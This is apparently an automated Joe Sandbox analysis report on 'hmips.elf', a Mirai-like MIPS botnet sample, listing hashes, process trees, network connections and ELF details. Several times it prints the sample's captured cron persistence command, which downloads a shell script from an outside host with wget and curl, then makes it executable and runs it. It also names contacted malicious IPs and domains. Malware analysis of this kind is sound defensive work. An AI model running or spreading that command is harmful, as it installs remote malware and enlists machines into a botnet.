Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
hmips.elf

Overview

General Information

Sample name:hmips.elf
Analysis ID:1557029
MD5:70195f9dca045f4baf79fff2865f2fd5
SHA1:0f12d55838271ee42cb53211e765e474d5885ff2
SHA256:091021063c767ef9acf561f6d5c98ce8a2878f5722fb9ef717740030435bd6c9
Tags:elfuser-abuse_ch
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false

Signatures

Connects to many ports of the same IP (likely port scanning)
Executes the "crontab" command typically for achieving persistence
Sample tries to persist itself using cron
Detected TCP or UDP traffic on non-standard ports
Executes commands using a shell command-line interpreter
Found strings indicative of a multi-platform dropper
Sample has stripped symbol table
Sample listens on a socket
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1557029
Start date and time:2024-11-17 04:41:06 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 45s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:hmips.elf
Detection:MAL
Classification:mal52.troj.linELF@0/1@50/0
Command:/tmp/hmips.elf
PID:6257
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
you are now apart of hail cock botnet
Standard Error:no crontab for root
  • system is lnxubuntu20
  • hmips.elf (PID: 6257, Parent: 6168, MD5: 0083f1f0e77be34ad27f849842bbb00c) Arguments: /tmp/hmips.elf
    • sh (PID: 6259, Parent: 6257, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
      • sh New Fork (PID: 6261, Parent: 6259)
        • sh New Fork (PID: 6263, Parent: 6261)
        • crontab (PID: 6263, Parent: 6261, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
      • sh New Fork (PID: 6262, Parent: 6259)
      • crontab (PID: 6262, Parent: 6259, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results
Source: tmp.fGfSNF.18.drString: @reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh

Networking

barindex
Source: global trafficTCP traffic: 194.58.66.244 ports 1,2,4,7,24781,8
Source: global trafficTCP traffic: 193.233.193.45 ports 9462,1,2,3,12835,5,8
Source: global trafficTCP traffic: 103.136.150.114 ports 1,13959,3,5,9,6429
Source: global trafficTCP traffic: 81.29.149.178 ports 16520,0,1,3,9,10399
Source: global trafficTCP traffic: 45.147.200.148 ports 5827,10932,2,5,7,8
Source: global trafficTCP traffic: 45.140.168.235 ports 1,2,4,7,24781,8
Source: global trafficTCP traffic: 89.32.41.42 ports 13185,16709,1,3,5,8,16546
Source: global trafficTCP traffic: 192.168.2.23:50782 -> 194.58.66.244:24781
Source: global trafficTCP traffic: 192.168.2.23:44128 -> 45.140.168.235:24781
Source: global trafficTCP traffic: 192.168.2.23:41430 -> 194.87.30.79:21151
Source: global trafficTCP traffic: 192.168.2.23:41860 -> 176.32.39.112:2449
Source: global trafficTCP traffic: 192.168.2.23:48442 -> 86.107.100.80:10788
Source: global trafficTCP traffic: 192.168.2.23:55028 -> 81.29.149.178:10399
Source: global trafficTCP traffic: 192.168.2.23:40386 -> 45.147.200.148:5827
Source: global trafficTCP traffic: 192.168.2.23:33076 -> 89.32.41.42:13185
Source: global trafficTCP traffic: 192.168.2.23:47094 -> 213.182.204.57:15929
Source: global trafficTCP traffic: 192.168.2.23:45040 -> 31.13.248.13:12125
Source: global trafficTCP traffic: 192.168.2.23:39628 -> 103.136.150.114:13959
Source: global trafficTCP traffic: 192.168.2.23:36162 -> 193.233.193.45:12835
Source: global trafficTCP traffic: 192.168.2.23:54688 -> 91.149.218.232:2344
Source: global trafficTCP traffic: 192.168.2.23:42856 -> 209.141.57.98:7266
Source: /tmp/hmips.elf (PID: 6257)Socket: 127.0.0.1:1172Jump to behavior
Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 194.58.66.244
Source: unknownTCP traffic detected without corresponding DNS query: 194.58.66.244
Source: unknownTCP traffic detected without corresponding DNS query: 194.58.66.244
Source: unknownTCP traffic detected without corresponding DNS query: 194.58.66.244
Source: unknownTCP traffic detected without corresponding DNS query: 45.140.168.235
Source: unknownTCP traffic detected without corresponding DNS query: 45.140.168.235
Source: unknownTCP traffic detected without corresponding DNS query: 45.140.168.235
Source: unknownTCP traffic detected without corresponding DNS query: 45.140.168.235
Source: unknownTCP traffic detected without corresponding DNS query: 194.58.66.244
Source: unknownTCP traffic detected without corresponding DNS query: 194.58.66.244
Source: unknownTCP traffic detected without corresponding DNS query: 194.58.66.244
Source: unknownTCP traffic detected without corresponding DNS query: 45.140.168.235
Source: unknownTCP traffic detected without corresponding DNS query: 45.140.168.235
Source: unknownTCP traffic detected without corresponding DNS query: 45.140.168.235
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.30.79
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.30.79
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.30.79
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.30.79
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.30.79
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.30.79
Source: unknownTCP traffic detected without corresponding DNS query: 176.32.39.112
Source: unknownTCP traffic detected without corresponding DNS query: 176.32.39.112
Source: unknownTCP traffic detected without corresponding DNS query: 176.32.39.112
Source: unknownTCP traffic detected without corresponding DNS query: 176.32.39.112
Source: unknownTCP traffic detected without corresponding DNS query: 176.32.39.112
Source: unknownTCP traffic detected without corresponding DNS query: 176.32.39.112
Source: unknownTCP traffic detected without corresponding DNS query: 176.32.39.112
Source: unknownTCP traffic detected without corresponding DNS query: 86.107.100.80
Source: unknownTCP traffic detected without corresponding DNS query: 86.107.100.80
Source: unknownTCP traffic detected without corresponding DNS query: 86.107.100.80
Source: unknownTCP traffic detected without corresponding DNS query: 86.107.100.80
Source: unknownTCP traffic detected without corresponding DNS query: 81.29.149.178
Source: unknownTCP traffic detected without corresponding DNS query: 81.29.149.178
Source: unknownTCP traffic detected without corresponding DNS query: 81.29.149.178
Source: unknownTCP traffic detected without corresponding DNS query: 81.29.149.178
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 86.107.100.80
Source: unknownTCP traffic detected without corresponding DNS query: 81.29.149.178
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 45.147.200.148
Source: unknownTCP traffic detected without corresponding DNS query: 45.147.200.148
Source: unknownTCP traffic detected without corresponding DNS query: 45.147.200.148
Source: unknownTCP traffic detected without corresponding DNS query: 45.147.200.148
Source: unknownTCP traffic detected without corresponding DNS query: 45.147.200.148
Source: unknownTCP traffic detected without corresponding DNS query: 45.147.200.148
Source: unknownTCP traffic detected without corresponding DNS query: 89.32.41.42
Source: global trafficDNS traffic detected: DNS query: kingstonwikkerink.dyn
Source: tmp.fGfSNF.18.drString found in binary or memory: http://hailcocks.ru/wget.sh;
Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
Source: ELF static info symbol of initial sample.symtab present: no
Source: classification engineClassification label: mal52.troj.linELF@0/1@50/0

Persistence and Installation Behavior

barindex
Source: /bin/sh (PID: 6263)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
Source: /bin/sh (PID: 6262)Crontab executable: /usr/bin/crontab -> crontab -Jump to behavior
Source: /usr/bin/crontab (PID: 6262)File: /var/spool/cron/crontabs/tmp.fGfSNFJump to behavior
Source: /usr/bin/crontab (PID: 6262)File: /var/spool/cron/crontabs/rootJump to behavior
Source: /tmp/hmips.elf (PID: 6259)Shell command executed: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"Jump to behavior
Source: submitted sampleStderr: no crontab for root: exit code = 0
Source: /tmp/hmips.elf (PID: 6257)Queries kernel information via 'uname': Jump to behavior
Source: hmips.elf, 6257.1.00007ffc286c7000.00007ffc286e8000.rw-.sdmp, hmips.elf, 6264.1.00007ffc286c7000.00007ffc286e8000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-mips/tmp/hmips.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/hmips.elf
Source: hmips.elf, 6257.1.000055c0e349d000.000055c0e3566000.rw-.sdmp, hmips.elf, 6264.1.000055c0e349d000.000055c0e3566000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/mips
Source: hmips.elf, 6257.1.000055c0e349d000.000055c0e3566000.rw-.sdmp, hmips.elf, 6264.1.000055c0e349d000.000055c0e3566000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/mips
Source: hmips.elf, 6257.1.00007ffc286c7000.00007ffc286e8000.rw-.sdmp, hmips.elf, 6264.1.00007ffc286c7000.00007ffc286e8000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mips
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information2
Scripting
Valid Accounts1
Scheduled Task/Job
1
Scheduled Task/Job
1
Scheduled Task/Job
Direct Volume AccessOS Credential Dumping11
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job2
Scripting
Boot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Standard Port
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
Application Layer Protocol
Traffic DuplicationData Destruction
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1557029 Sample: hmips.elf Startdate: 17/11/2024 Architecture: LINUX Score: 52 30 194.58.66.244, 24781, 50782 RELCOM-ASRelcomGroup19022019RU Russian Federation 2->30 32 103.136.150.114, 13959, 39628, 42222 QUICKPACKETUS Hong Kong 2->32 34 16 other IPs or domains 2->34 40 Connects to many ports of the same IP (likely port scanning) 2->40 9 hmips.elf 2->9         started        signatures3 process4 process5 11 hmips.elf sh 9->11         started        13 hmips.elf 9->13         started        15 hmips.elf 9->15         started        process6 17 sh crontab 11->17         started        21 sh 11->21         started        23 hmips.elf 13->23         started        file7 28 /var/spool/cron/crontabs/tmp.fGfSNF, ASCII 17->28 dropped 36 Sample tries to persist itself using cron 17->36 38 Executes the "crontab" command typically for achieving persistence 17->38 25 sh crontab 21->25         started        signatures8 process9 signatures10 42 Executes the "crontab" command typically for achieving persistence 25->42
SourceDetectionScannerLabelLink
hmips.elf11%ReversingLabsLinux.Backdoor.Mirai
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
kingstonwikkerink.dyn
unknown
unknownfalse
    high
    NameSourceMaliciousAntivirus DetectionReputation
    http://hailcocks.ru/wget.sh;tmp.fGfSNF.18.drfalse
      high
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      194.58.66.244
      unknownRussian Federation
      2118RELCOM-ASRelcomGroup19022019RUtrue
      194.87.30.79
      unknownRussian Federation
      2118RELCOM-ASRelcomGroup19022019RUfalse
      213.182.204.57
      unknownLatvia
      9009M247GBfalse
      193.233.193.45
      unknownRussian Federation
      2895FREE-NET-ASFREEnetEUtrue
      86.107.100.80
      unknownRomania
      38995AMG-ASROfalse
      209.141.57.98
      unknownUnited States
      53667PONYNETUSfalse
      81.29.149.178
      unknownSwitzerland
      39616COMUNICA_IT_SERVICESCHtrue
      45.147.200.148
      unknownRussian Federation
      51659ASBAXETRUtrue
      45.140.168.235
      unknownRussian Federation
      51659ASBAXETRUtrue
      91.189.91.43
      unknownUnited Kingdom
      41231CANONICAL-ASGBfalse
      91.189.91.42
      unknownUnited Kingdom
      41231CANONICAL-ASGBfalse
      109.202.202.202
      unknownSwitzerland
      13030INIT7CHfalse
      91.149.218.232
      unknownPoland
      198401GECKONET-ASPLfalse
      31.13.248.13
      unknownBulgaria
      34224NETERRA-ASBGfalse
      176.32.39.112
      unknownRussian Federation
      51659ASBAXETRUfalse
      103.136.150.114
      unknownHong Kong
      46261QUICKPACKETUStrue
      89.32.41.42
      unknownRomania
      48874HOSTMAZEHOSTMAZEROtrue
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      213.182.204.57mips.elfGet hashmaliciousUnknownBrowse
        arm7.elfGet hashmaliciousUnknownBrowse
          nsharm7.elfGet hashmaliciousUnknownBrowse
            nshmips.elfGet hashmaliciousUnknownBrowse
              harm5.elfGet hashmaliciousUnknownBrowse
                mpsl.elfGet hashmaliciousUnknownBrowse
                  arm5.elfGet hashmaliciousUnknownBrowse
                    arm4.elfGet hashmaliciousUnknownBrowse
                      mpsl.elfGet hashmaliciousUnknownBrowse
                        arm7-20241104-0018.elfGet hashmaliciousUnknownBrowse
                          209.141.57.98arm.elfGet hashmaliciousUnknownBrowse
                            harm4.elfGet hashmaliciousUnknownBrowse
                              193.233.193.45arm7.elfGet hashmaliciousUnknownBrowse
                                harm4.elfGet hashmaliciousUnknownBrowse
                                  harm5.elfGet hashmaliciousUnknownBrowse
                                    nshsh4.elfGet hashmaliciousUnknownBrowse
                                      nsharm5.elfGet hashmaliciousUnknownBrowse
                                        nsharm.elfGet hashmaliciousUnknownBrowse
                                          nshppc.elfGet hashmaliciousUnknownBrowse
                                            nshmips.elfGet hashmaliciousUnknownBrowse
                                              arm7.elfGet hashmaliciousUnknownBrowse
                                                mpsl.elfGet hashmaliciousUnknownBrowse
                                                  81.29.149.178arm5.elfGet hashmaliciousUnknownBrowse
                                                    ppc.elfGet hashmaliciousUnknownBrowse
                                                      harm4.elfGet hashmaliciousUnknownBrowse
                                                        harm5.elfGet hashmaliciousUnknownBrowse
                                                          nshsh4.elfGet hashmaliciousUnknownBrowse
                                                            nsharm7.elfGet hashmaliciousUnknownBrowse
                                                              nsharm.elfGet hashmaliciousUnknownBrowse
                                                                nshppc.elfGet hashmaliciousUnknownBrowse
                                                                  nshmips.elfGet hashmaliciousUnknownBrowse
                                                                    harm5.elfGet hashmaliciousUnknownBrowse
                                                                      86.107.100.80arm5.elfGet hashmaliciousUnknownBrowse
                                                                        mips.elfGet hashmaliciousUnknownBrowse
                                                                          arm7.elfGet hashmaliciousUnknownBrowse
                                                                            arm.elfGet hashmaliciousUnknownBrowse
                                                                              harm4.elfGet hashmaliciousUnknownBrowse
                                                                                harm5.elfGet hashmaliciousUnknownBrowse
                                                                                  harm4.elfGet hashmaliciousUnknownBrowse
                                                                                    nsharm7.elfGet hashmaliciousUnknownBrowse
                                                                                      nsharm5.elfGet hashmaliciousUnknownBrowse
                                                                                        nsharm.elfGet hashmaliciousUnknownBrowse
                                                                                          No context
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          M247GBfile.exeGet hashmaliciousNetSupport RATBrowse
                                                                                          • 45.61.128.74
                                                                                          file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                          • 45.61.128.74
                                                                                          yhYrGCKq9s.exeGet hashmaliciousRedLineBrowse
                                                                                          • 91.202.233.18
                                                                                          meerkat.arm.elfGet hashmaliciousMiraiBrowse
                                                                                          • 38.201.237.116
                                                                                          botnet.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                          • 38.207.55.160
                                                                                          mips.elfGet hashmaliciousUnknownBrowse
                                                                                          • 213.182.204.57
                                                                                          arm7.elfGet hashmaliciousUnknownBrowse
                                                                                          • 213.182.204.57
                                                                                          bin.sh.elfGet hashmaliciousMiraiBrowse
                                                                                          • 45.88.100.118
                                                                                          sora.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                          • 38.206.146.185
                                                                                          botnet.sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                          • 173.211.86.154
                                                                                          RELCOM-ASRelcomGroup19022019RUSupply Contract 12 Additional Agreement to 76_24_.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                          • 194.58.83.68
                                                                                          lchs.exeGet hashmaliciousQuasarBrowse
                                                                                          • 193.124.33.141
                                                                                          jKira.armGet hashmaliciousMiraiBrowse
                                                                                          • 195.133.54.44
                                                                                          RELCOM-ASRelcomGroup19022019RUSupply Contract 12 Additional Agreement to 76_24_.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                          • 194.58.83.68
                                                                                          lchs.exeGet hashmaliciousQuasarBrowse
                                                                                          • 193.124.33.141
                                                                                          jKira.armGet hashmaliciousMiraiBrowse
                                                                                          • 195.133.54.44
                                                                                          AMG-ASROarm5.elfGet hashmaliciousUnknownBrowse
                                                                                          • 86.107.100.80
                                                                                          mips.elfGet hashmaliciousUnknownBrowse
                                                                                          • 86.107.100.80
                                                                                          arm7.elfGet hashmaliciousUnknownBrowse
                                                                                          • 86.107.100.80
                                                                                          arm.elfGet hashmaliciousUnknownBrowse
                                                                                          • 86.107.100.80
                                                                                          harm4.elfGet hashmaliciousUnknownBrowse
                                                                                          • 86.107.100.80
                                                                                          harm5.elfGet hashmaliciousUnknownBrowse
                                                                                          • 86.107.100.80
                                                                                          harm4.elfGet hashmaliciousUnknownBrowse
                                                                                          • 86.107.100.80
                                                                                          nsharm7.elfGet hashmaliciousUnknownBrowse
                                                                                          • 86.107.100.80
                                                                                          nsharm5.elfGet hashmaliciousUnknownBrowse
                                                                                          • 86.107.100.80
                                                                                          nsharm.elfGet hashmaliciousUnknownBrowse
                                                                                          • 86.107.100.80
                                                                                          FREE-NET-ASFREEnetEUfile.exeGet hashmaliciousDanaBotBrowse
                                                                                          • 193.233.232.101
                                                                                          xd.spc.elfGet hashmaliciousMiraiBrowse
                                                                                          • 193.233.234.114
                                                                                          RECIBO TRANSFERENCIA#0000078.exeGet hashmaliciousUnknownBrowse
                                                                                          • 193.233.203.63
                                                                                          RECIBO TRANSFERENCIA#0000078.exeGet hashmaliciousUnknownBrowse
                                                                                          • 193.233.203.63
                                                                                          n7ZKbApaa3.dllGet hashmaliciousLummaC, XmrigBrowse
                                                                                          • 147.45.47.81
                                                                                          nlJ2sNaZVi.exeGet hashmaliciousLummaCBrowse
                                                                                          • 147.45.44.131
                                                                                          file.exeGet hashmaliciousClipboard HijackerBrowse
                                                                                          • 147.45.47.61
                                                                                          file.exeGet hashmaliciousClipboard HijackerBrowse
                                                                                          • 147.45.47.61
                                                                                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                          • 147.45.47.61
                                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                                          • 147.45.47.61
                                                                                          No context
                                                                                          No context
                                                                                          Process:/usr/bin/crontab
                                                                                          File Type:ASCII text
                                                                                          Category:dropped
                                                                                          Size (bytes):306
                                                                                          Entropy (8bit):5.174479587848761
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:SUrpqoqQjEOP1KmREJOBFQZBMvZHGMQ5UYLtCFt3HY5DMFDKXsJovYL8jndFKXsV:8QjHig8ZBMJeHLUHYC+GABjnOGAFkz
                                                                                          MD5:C0CBF5281A31751CDD45B5F785DDD5FC
                                                                                          SHA1:F68B62232EA5CEC68E95D0FF10029F479731F8B3
                                                                                          SHA-256:9F01AF064F2136A983E561A874CBFBC089B16D9825FA69E600D9A76FD6FDFDB8
                                                                                          SHA-512:EC49E7C8A50CBF91B222FD79B169FE10B2959BA956102E7EA61E7B79120DE332DB267B6DEECCD043D6FA59CFF4EDAB777FB4B447D5E7C4346BB3825E8C71A3F9
                                                                                          Malicious:true
                                                                                          Reputation:low
                                                                                          Preview:# DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Sat Nov 16 21:41:53 2024).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh.
                                                                                          File type:ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
                                                                                          Entropy (8bit):5.3627303167032725
                                                                                          TrID:
                                                                                          • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                                          File name:hmips.elf
                                                                                          File size:76'996 bytes
                                                                                          MD5:70195f9dca045f4baf79fff2865f2fd5
                                                                                          SHA1:0f12d55838271ee42cb53211e765e474d5885ff2
                                                                                          SHA256:091021063c767ef9acf561f6d5c98ce8a2878f5722fb9ef717740030435bd6c9
                                                                                          SHA512:6b758068681732a61329bc39b9b59d2ec530bb1dbe581ac81e70e9329785a0b911ed40b9eeaec05f27b69136c967f8d21ef12489bd0b0c1c957af4caadc75819
                                                                                          SSDEEP:1536:/j0M+bXeCoMdsJ/KJ/tW/6LC6Z2RXG4YB1eyKWL18hE:IMoMMde6Z2RWFBl8hE
                                                                                          TLSH:8373C84E6E318FEDF66C833447B74A31A75923D523E19685E2ACD2102F7024E585FFA8
                                                                                          File Content Preview:.ELF.....................@.`...4..*......4. ...(.............@...@........................ ..E ..E ....0..[.........dt.Q............................<...'..L...!'.......................<...'..(...!... ....'9... ......................<...'......!........'9.

                                                                                          ELF header

                                                                                          Class:ELF32
                                                                                          Data:2's complement, big endian
                                                                                          Version:1 (current)
                                                                                          Machine:MIPS R3000
                                                                                          Version Number:0x1
                                                                                          Type:EXEC (Executable file)
                                                                                          OS/ABI:UNIX - System V
                                                                                          ABI Version:0
                                                                                          Entry Point Address:0x400260
                                                                                          Flags:0x1007
                                                                                          ELF Header Size:52
                                                                                          Program Header Offset:52
                                                                                          Program Header Size:32
                                                                                          Number of Program Headers:3
                                                                                          Section Header Offset:76436
                                                                                          Section Header Size:40
                                                                                          Number of Section Headers:14
                                                                                          Header String Table Index:13
                                                                                          NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                                          NULL0x00x00x00x00x0000
                                                                                          .initPROGBITS0x4000940x940x8c0x00x6AX004
                                                                                          .textPROGBITS0x4001200x1200xfc400x00x6AX0016
                                                                                          .finiPROGBITS0x40fd600xfd600x5c0x00x6AX004
                                                                                          .rodataPROGBITS0x40fdc00xfdc00x1a000x00x2A0016
                                                                                          .ctorsPROGBITS0x4520000x120000x80x00x3WA004
                                                                                          .dtorsPROGBITS0x4520080x120080x80x00x3WA004
                                                                                          .data.rel.roPROGBITS0x4520140x120140x40x00x3WA004
                                                                                          .dataPROGBITS0x4520200x120200x3c80x00x3WA0016
                                                                                          .gotPROGBITS0x4523f00x123f00x6400x40x10000003WAp0016
                                                                                          .sbssNOBITS0x452a300x12a300x2c0x00x10000003WAp004
                                                                                          .bssNOBITS0x452a600x12a300x51380x00x3WA0016
                                                                                          .mdebug.abi32PROGBITS0xcde0x12a300x00x00x0001
                                                                                          .shstrtabSTRTAB0x00x12a300x640x00x0001
                                                                                          TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                                          LOAD0x00x4000000x4000000x117c00x117c05.51810x5R E0x10000.init .text .fini .rodata
                                                                                          LOAD0x120000x4520000x4520000xa300x5b983.45750x6RW 0x10000.ctors .dtors .data.rel.ro .data .got .sbss .bss
                                                                                          GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Nov 17, 2024 04:41:52.480710030 CET43928443192.168.2.2391.189.91.42
                                                                                          Nov 17, 2024 04:41:54.917974949 CET5078224781192.168.2.23194.58.66.244
                                                                                          Nov 17, 2024 04:41:54.923032045 CET2478150782194.58.66.244192.168.2.23
                                                                                          Nov 17, 2024 04:41:54.923281908 CET5078224781192.168.2.23194.58.66.244
                                                                                          Nov 17, 2024 04:41:54.923281908 CET5078224781192.168.2.23194.58.66.244
                                                                                          Nov 17, 2024 04:41:54.928180933 CET2478150782194.58.66.244192.168.2.23
                                                                                          Nov 17, 2024 04:41:54.928246975 CET5078224781192.168.2.23194.58.66.244
                                                                                          Nov 17, 2024 04:41:54.933146954 CET2478150782194.58.66.244192.168.2.23
                                                                                          Nov 17, 2024 04:41:55.035797119 CET4412824781192.168.2.2345.140.168.235
                                                                                          Nov 17, 2024 04:41:55.040750027 CET247814412845.140.168.235192.168.2.23
                                                                                          Nov 17, 2024 04:41:55.041357040 CET4412824781192.168.2.2345.140.168.235
                                                                                          Nov 17, 2024 04:41:55.041357040 CET4412824781192.168.2.2345.140.168.235
                                                                                          Nov 17, 2024 04:41:55.046212912 CET247814412845.140.168.235192.168.2.23
                                                                                          Nov 17, 2024 04:41:55.046331882 CET4412824781192.168.2.2345.140.168.235
                                                                                          Nov 17, 2024 04:41:55.051166058 CET247814412845.140.168.235192.168.2.23
                                                                                          Nov 17, 2024 04:41:55.871092081 CET2478150782194.58.66.244192.168.2.23
                                                                                          Nov 17, 2024 04:41:55.871143103 CET2478150782194.58.66.244192.168.2.23
                                                                                          Nov 17, 2024 04:41:55.871473074 CET5078224781192.168.2.23194.58.66.244
                                                                                          Nov 17, 2024 04:41:55.871474028 CET5078224781192.168.2.23194.58.66.244
                                                                                          Nov 17, 2024 04:41:55.871474028 CET5078224781192.168.2.23194.58.66.244
                                                                                          Nov 17, 2024 04:41:57.241957903 CET247814412845.140.168.235192.168.2.23
                                                                                          Nov 17, 2024 04:41:57.241983891 CET247814412845.140.168.235192.168.2.23
                                                                                          Nov 17, 2024 04:41:57.242104053 CET4412824781192.168.2.2345.140.168.235
                                                                                          Nov 17, 2024 04:41:57.242104053 CET4412824781192.168.2.2345.140.168.235
                                                                                          Nov 17, 2024 04:41:57.242381096 CET4412824781192.168.2.2345.140.168.235
                                                                                          Nov 17, 2024 04:41:58.111892939 CET42836443192.168.2.2391.189.91.43
                                                                                          Nov 17, 2024 04:41:59.391736984 CET4251680192.168.2.23109.202.202.202
                                                                                          Nov 17, 2024 04:42:00.921154022 CET4143021151192.168.2.23194.87.30.79
                                                                                          Nov 17, 2024 04:42:00.926302910 CET2115141430194.87.30.79192.168.2.23
                                                                                          Nov 17, 2024 04:42:00.926363945 CET4143021151192.168.2.23194.87.30.79
                                                                                          Nov 17, 2024 04:42:00.926407099 CET4143021151192.168.2.23194.87.30.79
                                                                                          Nov 17, 2024 04:42:00.931408882 CET2115141430194.87.30.79192.168.2.23
                                                                                          Nov 17, 2024 04:42:00.931461096 CET4143021151192.168.2.23194.87.30.79
                                                                                          Nov 17, 2024 04:42:00.936482906 CET2115141430194.87.30.79192.168.2.23
                                                                                          Nov 17, 2024 04:42:01.877898932 CET2115141430194.87.30.79192.168.2.23
                                                                                          Nov 17, 2024 04:42:01.877988100 CET4143021151192.168.2.23194.87.30.79
                                                                                          Nov 17, 2024 04:42:01.878093958 CET4143021151192.168.2.23194.87.30.79
                                                                                          Nov 17, 2024 04:42:02.291441917 CET418602449192.168.2.23176.32.39.112
                                                                                          Nov 17, 2024 04:42:02.296536922 CET244941860176.32.39.112192.168.2.23
                                                                                          Nov 17, 2024 04:42:02.296608925 CET418602449192.168.2.23176.32.39.112
                                                                                          Nov 17, 2024 04:42:02.296628952 CET418602449192.168.2.23176.32.39.112
                                                                                          Nov 17, 2024 04:42:02.301510096 CET244941860176.32.39.112192.168.2.23
                                                                                          Nov 17, 2024 04:42:02.301569939 CET418602449192.168.2.23176.32.39.112
                                                                                          Nov 17, 2024 04:42:02.306464911 CET244941860176.32.39.112192.168.2.23
                                                                                          Nov 17, 2024 04:42:03.325992107 CET244941860176.32.39.112192.168.2.23
